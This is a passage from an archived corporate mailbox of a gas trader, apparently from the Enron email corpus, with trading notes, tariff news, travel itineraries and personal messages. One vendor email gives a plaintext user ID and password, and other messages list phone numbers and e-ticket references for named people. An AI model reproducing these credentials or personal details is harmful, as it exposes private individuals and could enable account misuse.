X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Here is what I have.  Please let me know if you see any mistakes.  Do not
wait until after Sunday to let me know.  Thanks.

Craig Kooken
mobile 281-536-4306

 - Wk 15 Results .xls
 - FF Yearly Composite15.XLS
 - FF Weeks 1-17.XLS

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <29984837.1075857295055.JavaMail.evans@thyme>
Date: Tue, 8 May 2001 08:35:00 -0700 (PDT)
From: brad.mckay@enron.com
To: gateway1@pdq.net
Subject: ClickAtHome Portal is HERE!
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: gateway1@pdq.net
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

---------------------- Forwarded by Brad McKay/HOU/ECT on 05/08/2001 03:35 PM 
---------------------------
   
	Enron North America Corp.
	
	From:  Click at Home @ ENRON                           05/07/2001 10:20 PM
	

Sent by: Enron Announcements@ENRON
To: All Enron Employees United States
cc:  
Subject: ClickAtHome Portal is HERE!

Version 2.0 of the ClickAtHome Portal is now available!  
 Log into www.clickathome.net now, from work or home!

Access the PEP System through the portal!  
 Choose your reviewers and fill out your evaluations in the comfort and 
privacy of your home!

Outlook Web Access and eHRonline will be available SOON!  

The ClickAtHome portal is fully customizable for you!  
 YOU choose the content on each page, as well as the look and feel! 

Note: the ClickAtHome portal must be launched through an Internet Explorer 
browser, 5.0 or higher.

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <1143849.1075857295076.JavaMail.evans@thyme>
Date: Tue, 8 May 2001 08:36:00 -0700 (PDT)
From: james.barker@enron.com
To: brad.mckay@enron.com
Subject: Offers
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: James R Barker
X-To: Brad McKay
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

We are done on the CNG volumes below.   EES buys NX+ .4875.

Thanks


---------------------- Forwarded by James R Barker/HOU/EES on 05/08/2001 
03:34 PM ---------------------------

	Enron Energy Services
	
	From:  James R Barker                           05/08/2001 10:22 AM
	Phone No: 713 853-3437
	



To: Martin Cuilla/Enron@EnronXGate, Brad McKay/HOU/ECT@ECT
cc:  
Subject: Offers

Looking for NX+ offers on the following monthly loads, deal should close 
early today.




From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <22013421.1075857295145.JavaMail.evans@thyme>
Date: Fri, 11 May 2001 06:06:00 -0700 (PDT)
From: laura.osman@travelpark.com
To: brad.mckay@enron.com
Subject: E-ticket Confirmation
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Laura Osman <laura.osman@travelpark.com>
X-To: "'Brad.McKay@enron.com'" <Brad.McKay@enron.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Tickets were issued per your request.

                                          AGENT LO/LO BOOKING REF ZDACKO

                                          YELLOW COPY TO LAURA
                                          MCKAY/BRAD
                                          ETKT RECEIPT
  ENRON CORP                              EB3222D
  ENRON CORP
  1400 SMITH
  HOUSTON TX 77002


  DATE:  MAY 11 2001

SERVICE               DATE  FROM           TO             DEPART  ARRIVE

AMERICAN AIRLINES     06JUN HOUSTON TX     DALLAS TX      1216P   128P
AA 845     Q          WED   G.BUSH INTERCO DALLAS FT WORT
           NON SMOKING      TERMINAL A     TERMINAL A
                                                          NON STOP
                            RESERVATION CONFIRMED         1:12 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES
                            SEAT 18A NO SMOKING CONFIRMED MCKAY/BRAD(IDS5

AMERICAN AIRLINES     06JUN DALLAS TX      SAN JOSE CABO  541P    743P
AA 875     N          WED   DALLAS FT WORT LOS CABOS
           NON SMOKING      TERMINAL A
                            SNACK                         NON STOP
                            RESERVATION CONFIRMED         3:02 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES
                            SEAT 22A NO SMOKING CONFIRMED MCKAY/BRAD(IDS5

AMERICAN AIRLINES     10JUN SAN JOSE CABO  DALLAS TX      210P    556P
AA 864     H          SUN   LOS CABOS      DALLAS FT WORT
           NON SMOKING                     TERMINAL A
                            LUNCH                         NON STOP
                            RESERVATION CONFIRMED         2:46 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES

AMERICAN AIRLINES     10JUN DALLAS TX      HOUSTON TX     901P    1010P
AA 487     H          SUN   DALLAS FT WORT G.BUSH INTERCO
           NON SMOKING      TERMINAL A     TERMINAL A
                                                          NON STOP
                            RESERVATION CONFIRMED         1:09 DURATION
                  AIRCRAFT: BOEING 727-200/200 ADVANCED
                            SEAT 20A NO SMOKING CONFIRMED MCKAY/BRAD(IDS5

MISCELLANEOUS         08OCT HOUSTON TX
                      MON   ** THANK YOU FOR USING THE TAP **

RESERVATION NUMBER(S)  AA/QROYUI

MCKAY/BRAD  S5C0413R1073

*******************************************
INTL TVLRS: CARRY SOS WALLET CARD W/ENRON ASSISTANCE INFO
CALL SOS MEDICAL EMERGENCY:IN U.S 800 523-6586
CALL SOS MEDICAL EMERGENCY:INTL 215 245-4707 (COLLECT)
*********************************************
THIS IS A NON-REFUNDABLE FARE THAT REQUIRES
TRAVEL ON THESE SPECIFIC DATES AND FLIGHTS.
ANY CHANGES WILL RESULT IN A PENALTY AND/OR
ADDITIONAL COLLECTION.
THIS IS THE PASSENGER RECEIPT FOR YOUR ELECTRONIC TICKET.
PLEASE CHECK-IN WITH PHOTO IDENTIFICATION AND WITH
EITHER (1) THIS RECEIPT OR (2) YOUR CONFIRMATION NUMBER.
YOUR ETKT CONFIRMATION NUMBER IS: QROYUI
LL FARES ARE SUBJECT TO CHANGE UNTIL TICKETED/PURCHASED


                                          AGENT LO/LO BOOKING REF ZDACKO

                                          YELLOW COPY TO LAURA
                                          MCKAY/TIFFANY
                                          ETKT RECEIPT
  ENRON CORP                              EB3222D
  1400 SMITH
  HOUSTON TX 77002



  DATE:  MAY 11 2001

SERVICE               DATE  FROM           TO             DEPART  ARRIVE

AMERICAN AIRLINES     06JUN HOUSTON TX     DALLAS TX      1216P   128P
AA 845     Q          WED   G.BUSH INTERCO DALLAS FT WORT
           NON SMOKING      TERMINAL A     TERMINAL A
                                                          NON STOP
                            RESERVATION CONFIRMED         1:12 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES
                            SEAT 18B NO SMOKING CONFIRMED MCKAY/TIFFANY(I

AMERICAN AIRLINES     06JUN DALLAS TX      SAN JOSE CABO  541P    743P
AA 875     N          WED   DALLAS FT WORT LOS CABOS
           NON SMOKING      TERMINAL A
                            SNACK                         NON STOP
                            RESERVATION CONFIRMED         3:02 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES
                            SEAT 22B NO SMOKING CONFIRMED MCKAY/TIFFANY(I

AMERICAN AIRLINES     10JUN SAN JOSE CABO  DALLAS TX      210P    556P
AA 864     H          SUN   LOS CABOS      DALLAS FT WORT
           NON SMOKING                     TERMINAL A
                            LUNCH                         NON STOP
                            RESERVATION CONFIRMED         2:46 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES

AMERICAN AIRLINES     10JUN DALLAS TX      HOUSTON TX     901P    1010P
AA 487     H          SUN   DALLAS FT WORT G.BUSH INTERCO
           NON SMOKING      TERMINAL A     TERMINAL A
                                                          NON STOP
                            RESERVATION CONFIRMED         1:09 DURATION
                  AIRCRAFT: BOEING 727-200/200 ADVANCED
D
                            SEAT 20B NO SMOKING CONFIRMED MCKAY/TIFFANY(I

RESERVATION NUMBER(S)  AA/QROYUI

MCKAY/TIFFANY  S5C0413R1073

THIS IS A NON-REFUNDABLE FARE THAT REQUIRES
TRAVEL ON THESE SPECIFIC DATES AND FLIGHTS.
ANY CHANGES WILL RESULT IN A PENALTY AND/OR
ADDITIONAL COLLECTION.
THIS IS THE PASSENGER RECEIPT FOR YOUR ELECTRONIC TICKET.
PLEASE CHECK-IN WITH PHOTO IDENTIFICATION AND WITH
EITHER (1) THIS RECEIPT OR (2) YOUR CONFIRMATION NUMBER.
YOUR ETKT CONFIRMATION NUMBER IS: QROYUI

Laura Osman
Travel Agency in the Park
713-860-1124



 -----Original Message-----
From:  Brad.McKay@enron.com [mailto:Brad.McKay@enron.com]
Sent: Friday, May 11, 2001 12:56 PM
To: laura.osman@travelpark.com
Subject: Re: Review and approve for accuracy.


Can you tell me if i can fly southwest to and from dallas? If I can what
would this cost me? Brad

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <1591556.1075848286215.JavaMail.evans@thyme>
Date: Mon, 31 Dec 1979 16:00:00 -0800 (PST)
From: brad.mckay@enron.com
To: mnl@ranches.org
Subject: JC
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: mnl@ranches.org
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Nov2001\Notes Folders\Discussion threads
X-Origin: MCKAY-B
X-FileName: bmckay.nsf

Mary Nell: I just wanted to tell how happy I am that all went well with JC's 
surgery. I do believe in miracles. I also wanted to relay to you something 
that I wanted to tell you awhile back, but I never did. Through all the 
difficult times that have taken place, you have been a true inspiration to 
me. I have absolutely no idea what you were going through but I tried many 
time to place myself in your shoes, and realized that the question I would 
most want answered is why. I then thought how I would react to not recieving 
an answer to this question and have concluded that  .  

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <25507680.1075857292150.JavaMail.evans@thyme>
Date: Thu, 30 Nov 2000 12:01:00 -0800 (PST)
From: mnl@ranches.org
To: dmoreland@austin.rr.com, chompers@flash.net, rex@arn.net,
	brad.mckay@enron.com
Subject: FW: Stalin Quote
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: "Mary Nell Lemert" <MNL@ranches.org>
X-To: "Dan Moreland" <dmoreland@austin.rr.com>, "Jas Lemert" <chompers@flash.net>, "J. Rex Lemert P.C." <rex@arn.net>, "Brad McKay" <Brad.Mckay@enron.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

-----Original Message-----
From: Teel Bivins [mailto:Teel@ranches.org]
Sent: Wednesday, November 22, 2000 10:14 AM
To: Alex Annett (E-mail); Andrew Bivins; Betty Bivins Lovell; Bill and Mary
Britain (E-mail); Bill Snure (E-mail); Bill Walsh (E-mail); Bob Gibson; Bob
Langhorne (E-mail); Burney Claire and Paul (E-mail); Byron Gossett (E-mail);
Caroline Smith; Dale Smith; Dan Branch (E-mail); Don Powell (E-mail); Ellen
Bivins; Emily O'Brien; Fergus Reid (E-mail); Frank Meneghetti (E-mail);
Glenn Mortimer (E-mail); Hamilton Madden; Hector Barreto (E-mail); Hollis
Russell (E-mail); Jack Miller (E-mail); Jim J. Brewer (E-mail); Jimmie Kone
(E-mail); John Indrieri (E-mail); John Pletcher; Joseph Samora (E-mail);
Julie Bivins; Katie Bivins (E-mail); Lea and Tom Blakeney (E-mail); Lee and
Mary Arnett (E-mail); Linda Gray; Linda Griggs; Mark Bivins; Mary Ceverha
(E-mail); Mary Nell Lemert; Meredith Childers; Miles Childers; Nancy Bivins
(E-mail); Neal Odom; Nick Mutton (E-mail); Ninia Bivins; Ninia Bivins
(E-mail); Patrick Oxford (E-mail); Paula Day (E-mail); Rex Lemert; Robert
*Duncan (E-mail); Robyn Hadley (E-mail); Ross Wilson (E-mail); Roy & Martha
Jarnagin (E-mail); Speaker John Thrasher (E-mail); Steve Minikes (E-mail);
Susie O'Brien; Terry Johnson (E-mail); Tim & Karen Hixon (E-mail); Tom
Bivins; Tom Roller (E-mail); Tommy Patterson (E-mail); Wales Madden IV;
Wayne Hamilton (E-mail); Wayne Moore (E-mail)
Subject: Stalin Quote

Stalin quote:
"Those who cast the votes decide nothing.
 Those who count the votes decide everything."

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <5428166.1075857294869.JavaMail.evans@thyme>
Date: Wed, 25 Apr 2001 07:00:00 -0700 (PDT)
From: neeran.pathak@enron.com
To: brad.mckay@enron.com
Subject: #6 spread
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Neeran Pathak
X-To: Brad McKay
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Here is the spread between NY #6 .7% sulfur and .3% sulfer. 

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <21728781.1075857291923.JavaMail.evans@thyme>
Date: Mon, 25 Sep 2000 03:04:00 -0700 (PDT)
From: brad.mckay@enron.com
To: thaywood@ftenergy.com
Subject: Restricted Algonquin
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: thaywood@ftenergy.com
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

I was the one that talked to David Behrman. We talked about splitting out the 
Algonquin Citygate prices. Why didn't you mention Algonquin in the Gas Daily 
article?
Brad

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <18026475.1075857292331.JavaMail.evans@thyme>
Date: Tue, 12 Dec 2000 02:09:00 -0800 (PST)
From: kelly@truequote.com
To: brad.mckay@enron.com
Subject: RE: New TrueQuote!
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: "Kelly Stroud" <kelly@truequote.com>
X-To: <Brad.McKay@enron.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

No offense taken personally.  I actually look forward to working
with you in the future.
-kelly

-----Original Message-----
From: Brad.McKay@enron.com [mailto:Brad.McKay@enron.com]
Sent: Monday, December 11, 2000 4:42 PM
To: kelly@truequote.com
Subject: Re: New TrueQuote!



Thanks for your help. I hope that you were not offended by my comments the
other day, they were not directed at you. Brad

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <31948577.1075857291902.JavaMail.evans@thyme>
Date: Tue, 12 Sep 2000 04:45:00 -0700 (PDT)
From: brad.mckay@enron.com
To: rex@arn.net
Subject: Gas Prices
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: rex@arn.net
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Rex: I have an article to fax to you please send me your fax #. I hope all is 
well in Amarillo. Longhorns look good, this weekend will be a good test for 
them. Tiff and the kids are great. Both kids are very excited to be in 
school, lets hope that this enthusiasm last for another 16 years. Brad

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <13036240.1075857294987.JavaMail.evans@thyme>
Date: Wed, 2 May 2001 07:44:00 -0700 (PDT)
From: brad.mckay@enron.com
To: gateway1@pdq.net
Subject: Fw: Death by overdose:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: gateway1@pdq.net
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

---------------------- Forwarded by Brad McKay/HOU/ECT on 05/02/2001 02:44 PM 
---------------------------


"Danna Burkett" <dmburkett@houston.rr.com> on 05/01/2001 04:44:11 PM
To: "Dana Burke" <dana63bug@earthlink.net>, <Brad.McKay@enron.com>, "Brenda 
Brunette" <BrendaBrunette@aol.com>, "Charlotte Hickey" 
<charlotteh@houston.rr.com>
cc:  
Subject: Fw: Death by overdose:


I knew you all would love this....Danna
----- Original Message -----
From: "davis w. simpson" <dwylie@prodigy.net>
To: <undisclosed-recipients:>
Sent: Monday, April 30, 2001 5:01 PM
Subject: Death by overdose:


> Yep, he took one Viagra too many.
>


----------------------------------------------------------------------------
----





 - cofin.jpg

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <4349655.1075857292226.JavaMail.evans@thyme>
Date: Mon, 4 Dec 2000 02:36:00 -0800 (PST)
From: enron.announcements@enron.com
To: all.employees@enron.com
Subject: Enron Wholesale Services Legal Department
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Enron Announcements
X-To: All Enron Wholesale Services Employees
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

 As a follow-up to the recent Enron Corp. memorandum forming Enron Wholesale 
Services (EWS), effective today, we have reorganized the Wholesale Services 
Legal Department.

 The goals in reorganizing the department are as follows:  (i) align the 
legal department as closely as possible with the business units, (ii) speed 
the flow of legal technology across the business units, and (iii) achieve 
greater efficiency and consistency across the organization.

 To this end, a legal policy group will be formed for EWS Legal, which will 
include Lance Schuler, Enron Americas; Mark Evans, Enron Europe; Mark Taylor, 
Enron Net Works; Alan Aronowitz, Enron Global Markets; Julia Murray, Enron 
Industrial Markets; and Bruce Lundstrom, Enron Global Assets.

 The organization chart for the EWS Legal Department is attached.  More 
comprehensive organization charts will follow for each group.

Mark Frevert and Mark Haedicke



From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <31537674.1075857295099.JavaMail.evans@thyme>
Date: Fri, 11 May 2001 05:44:00 -0700 (PDT)
From: laura.osman@travelpark.com
To: bmckay@ect.enron.com
Subject: Review and approve for accuracy.
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Laura Osman <laura.osman@travelpark.com>
X-To: "'BMCKAY@ECT.ENRON.COM'" <BMCKAY@ECT.ENRON.COM>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Tickets are non-refundable and prices are not guaranteed unless issued.  If
you are ready to issue please advise.

                                          AGENT LO/LO BOOKING REF ZDACKO

                                          YELLOW COPY TO LAURA


  ENRON CORP
  ENRON CORP
  1400 SMITH
  HOUSTON TX 77002


  DATE:  MAY 11 2001

SERVICE               DATE  FROM           TO             DEPART  ARRIVE

AMERICAN AIRLINES     06JUN HOUSTON TX     DALLAS TX      1216P   128P
AA 845     Q          WED   G.BUSH INTERCO DALLAS FT WORT
           NON SMOKING      TERMINAL A     TERMINAL A
                                                          NON STOP
                            RESERVATION CONFIRMED         1:12 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES
                            SEAT 18A NO SMOKING CONFIRMED MCKAY/BRAD(IDS5

AMERICAN AIRLINES     06JUN DALLAS TX      SAN JOSE CABO  541P    743P
AA 875     N          WED   DALLAS FT WORT LOS CABOS
           NON SMOKING      TERMINAL A
                            SNACK                         NON STOP
                            RESERVATION CONFIRMED         3:02 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES
                            SEAT 22A NO SMOKING CONFIRMED MCKAY/BRAD(IDS5

AMERICAN AIRLINES     10JUN SAN JOSE CABO  DALLAS TX      210P    556P
AA 864     H          SUN   LOS CABOS      DALLAS FT WORT
           NON SMOKING                     TERMINAL A
                            LUNCH                         NON STOP
                            RESERVATION CONFIRMED         2:46 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES

AMERICAN AIRLINES     10JUN DALLAS TX      HOUSTON TX     901P    1010P
AA 487     H          SUN   DALLAS FT WORT G.BUSH INTERCO
           NON SMOKING      TERMINAL A     TERMINAL A
                                                          NON STOP
                            RESERVATION CONFIRMED         1:09 DURATION
                  AIRCRAFT: BOEING 727-200/200 ADVANCED
                            SEAT 20A NO SMOKING CONFIRMED MCKAY/BRAD(IDS5

MISCELLANEOUS         08OCT HOUSTON TX
                      MON   ** THANK YOU FOR USING THE TAP **

RESERVATION NUMBER(S)  AA/QROYUI

MCKAY/BRAD  S5C0413R1073

*******************************************
INTL TVLRS: CARRY SOS WALLET CARD W/ENRON ASSISTANCE INFO
CALL SOS MEDICAL EMERGENCY:IN U.S 800 523-6586
CALL SOS MEDICAL EMERGENCY:INTL 215 245-4707 (COLLECT)
*********************************************
THIS IS A NON-REFUNDABLE FARE THAT REQUIRES
TRAVEL ON THESE SPECIFIC DATES AND FLIGHTS.
ANY CHANGES WILL RESULT IN A PENALTY AND/OR
ADDITIONAL COLLECTION.
ALL FARES ARE SUBJECT TO CHANGE UNTIL TICKETED/PURCHASED

                                          AGENT LO/LO BOOKING REF ZDACKO

                                          YELLOW COPY TO LAURA


  ENRON CORP
  1400 SMITH
  HOUSTON TX 77002



  DATE:  MAY 11 2001

SERVICE               DATE  FROM           TO             DEPART  ARRIVE

AMERICAN AIRLINES     06JUN HOUSTON TX     DALLAS TX      1216P   128P
AA 845     Q          WED   G.BUSH INTERCO DALLAS FT WORT
           NON SMOKING      TERMINAL A     TERMINAL A
                                                          NON STOP
                            RESERVATION CONFIRMED         1:12 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES
                            SEAT 18B NO SMOKING CONFIRMED MCKAY/TIFFANY

AMERICAN AIRLINES     06JUN DALLAS TX      SAN JOSE CABO  541P    743P
AA 875     N          WED   DALLAS FT WORT LOS CABOS
           NON SMOKING      TERMINAL A
                            SNACK                         NON STOP
                            RESERVATION CONFIRMED         3:02 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES
                            SEAT 22B NO SMOKING CONFIRMED MCKAY/TIFFANY

AMERICAN AIRLINES     10JUN SAN JOSE CABO  DALLAS TX      210P    556P
AA 864     H          SUN   LOS CABOS      DALLAS FT WORT
           NON SMOKING                     TERMINAL A
                            LUNCH                         NON STOP
                            RESERVATION CONFIRMED         2:46 DURATION
                  AIRCRAFT: MCDONNELL DOUGLAS ALL MD-80 SERIES

AMERICAN AIRLINES     10JUN DALLAS TX      HOUSTON TX     901P    1010P
AA 487     H          SUN   DALLAS FT WORT G.BUSH INTERCO
           NON SMOKING      TERMINAL A     TERMINAL A
                                                          NON STOP
                            RESERVATION CONFIRMED         1:09 DURATION
                  AIRCRAFT: BOEING 727-200/200 ADVANCED
D
                            SEAT 20B NO SMOKING CONFIRMED MCKAY/TIFFANY

RESERVATION NUMBER(S)  AA/QROYUI

MCKAY/TIFFANY

THIS IS A NON-REFUNDABLE FARE THAT REQUIRES
TRAVEL ON THESE SPECIFIC DATES AND FLIGHTS.
ANY CHANGES WILL RESULT IN A PENALTY AND/OR
ADDITIONAL COLLECTION.

Laura Osman
Travel Agency in the Park
713-860-1124


From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <7999463.1075857292352.JavaMail.evans@thyme>
Date: Tue, 12 Dec 2000 05:11:00 -0800 (PST)
From: john.taylor@enron.com
To: brad.mckay@enron.com
Subject: A good clip - please use your speakers
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: John Craig Taylor
X-To: Brad McKay
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

---------------------- Forwarded by John Craig Taylor/HOU/ECT on 12/12/2000 
01:10 PM ---------------------------


"Craig Taylor" <craig_taylor67@hotmail.com> on 12/12/2000 11:44:34 AM
To: john.craig.taylor@enron.com
cc:  
Subject: A good clip - please use your speakers





>From: "Jeff Hildreth" <jeff@abs-insurance.com>
>To: <jeff@abs-insurance.com>
>Subject: FW: FW: A good clip - please use your speakers
>Date: Tue, 12 Dec 2000 10:50:48 -0600
>
>
>Funny!
>

______________________________________________________________________________
_______
Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.com

 - salmon.asf

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <22576103.1075857291966.JavaMail.evans@thyme>
Date: Tue, 17 Oct 2000 06:24:00 -0700 (PDT)
From: brad.mckay@enron.com
To: mcrowel@kingranch.com
Subject: Hunting Prices
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: Mcrowel@kingranch.com
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Mary: Please send me prices for the following:
- quail lease
- quail guided hunt
- deer lease
- deer guided hunt
- duck lease
- duck guided hunt
 
thanks brad mckay

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <7369693.1075857294966.JavaMail.evans@thyme>
Date: Fri, 27 Apr 2001 04:06:00 -0700 (PDT)
From: suzanne.calcagno@enron.com
To: judy.townsend@enron.com, dan.junek@enron.com, victor.lamadrid@enron.com,
	victoria.versen@enron.com, kimberly.olinger@enron.com,
	chris.germany@enron.com, maureen.smith@enron.com,
	sandra.brawner@enron.com, brad.mckay@enron.com,
	robin.barbe@enron.com, mark.breese@enron.com,
	ruth.concannon@enron.com, john.hodge@enron.com,
	craig.taylor@enron.com, tammi.depaolis@enron.com,
	scott.goodell@enron.com, gil.muhl@enron.com
Subject: Change in Tetco Rates for June 1
Cc: rebecca.cantrell@enron.com, robert.superty@enron.com, donna.greif@enron.com,
	donna.fulton@enron.com, bob.hall@enron.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Bcc: rebecca.cantrell@enron.com, robert.superty@enron.com, donna.greif@enron.com,
	donna.fulton@enron.com, bob.hall@enron.com
X-From: Suzanne Calcagno
X-To: Judy Townsend, Dan Junek, Victor Lamadrid, Victoria Versen, Kimberly S Olinger, Chris Germany, Maureen Smith, Sandra F Brawner, Brad McKay, Robin Barbe, Mark Breese, Ruth Concannon, John Hodge, Craig Taylor, Tammi DePaolis, Scott Goodell, Gil Muhl
X-cc: Rebecca W Cantrell, Robert Superty, Donna Greif, Donna Fulton, Bob M Hall
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Hello All-

Attached above are the cover letter and proposed tariff sheets filed by Texas 
Eastern yesterday for a June 1 effective date.  The rate changes reflect 
under recoveries in their ASA account which tracks their cash-out mechanism 
and increased cost of system fuel.  The underrecovery in the ASA account has 
increased from $22,000 to over $22,000,000 over the period September 1--March 
31.  Texas Eastern claims that this is largely a result of the gaming of 
their currently monthly cash-out (which will likely be changed to weekly in 
their 637 proceeding).  As a result, Texas Eastern is seeking a waiver of the 
annual filing period in order to begin collecting the underrecovery through a 
surcharge that would amount to as much as $.0354 from ELA-M3.  Texas Eastern 
proposes to begin recovery in June so as to extend the recovery period from 
12 months (Dec-Nov) to 18 months (Jun-Nov), which will lower the level of the 
surcharge.

We'll review the filing to see if there are any grounds for protest / 
comment.  These types of dollars are usually "rubber-stamped" by FERC for 
pass-through but the filing to change the recovery time period may give us 
some grounds to protest the recovery.

 The full filing can be found at :  
http://infopost.link.duke-energy.com/infopost/default.asp?pipe=TE

Please let me know if you have any questions or need any additional 
information.

Thanks,
Suzanne

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <8648473.1075857292272.JavaMail.evans@thyme>
Date: Mon, 11 Dec 2000 02:02:00 -0800 (PST)
From: kelly@truequote.com
To: bmckay@enron.com
Subject: New TrueQuote!
Mime-Version: 1.0
Content-Type: text/plain; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: quoted-printable
X-From: "Kelly Stroud" <kelly@truequote.com>
X-To: "Brad McKay" <bmckay@enron.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Brad,
I am sending you my standard "form letter" that contains your user name and
password.
I understand that you may or may not find this system useful prior to us
going "executable"
but I wanted you to have the option of accessing it at your convenience.
Thanks, Kelly


USER ID:  bmckay
PASSWORD: enron43

Thank you for your participation in testing our new version of
truequote.com.  While this version is still a =01&view only=018 tool the fo=
rmat
will be identical to the version we will soon release with execution
capabilities.  I've assigned you a user specific user i.d. and password
above.  You can change your password whenever you like for added security.
To access the True Quote homepage: http://www.truequote.com

I'm including with this message a number of links that can help explain Tru=
e
Quotes new functionality.

A Flash demo to give you insight into True Quote:
http://www.truequote.com/download/tqintro2.exe
A link to the technical page that explains system requirements to optimize
True Quote:  http://www.truequote.com/info/tech.htm
A link to frequently asked questions regarding True Quote:
http://www.truequote.com/info/faqset.htm
Attached below you will find a printable users guide to help you navigate
the application.

Please do not hesitate to call me (713)622-5253 or Trevor Atkins
(800)327-1499 if you have any questions.




Sincerely,

Kelly Stroud
Account Executive





 - truequote users guide.doc

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <28474031.1075857292010.JavaMail.evans@thyme>
Date: Mon, 20 Nov 2000 02:54:00 -0800 (PST)
From: sean.boyle@enron.com
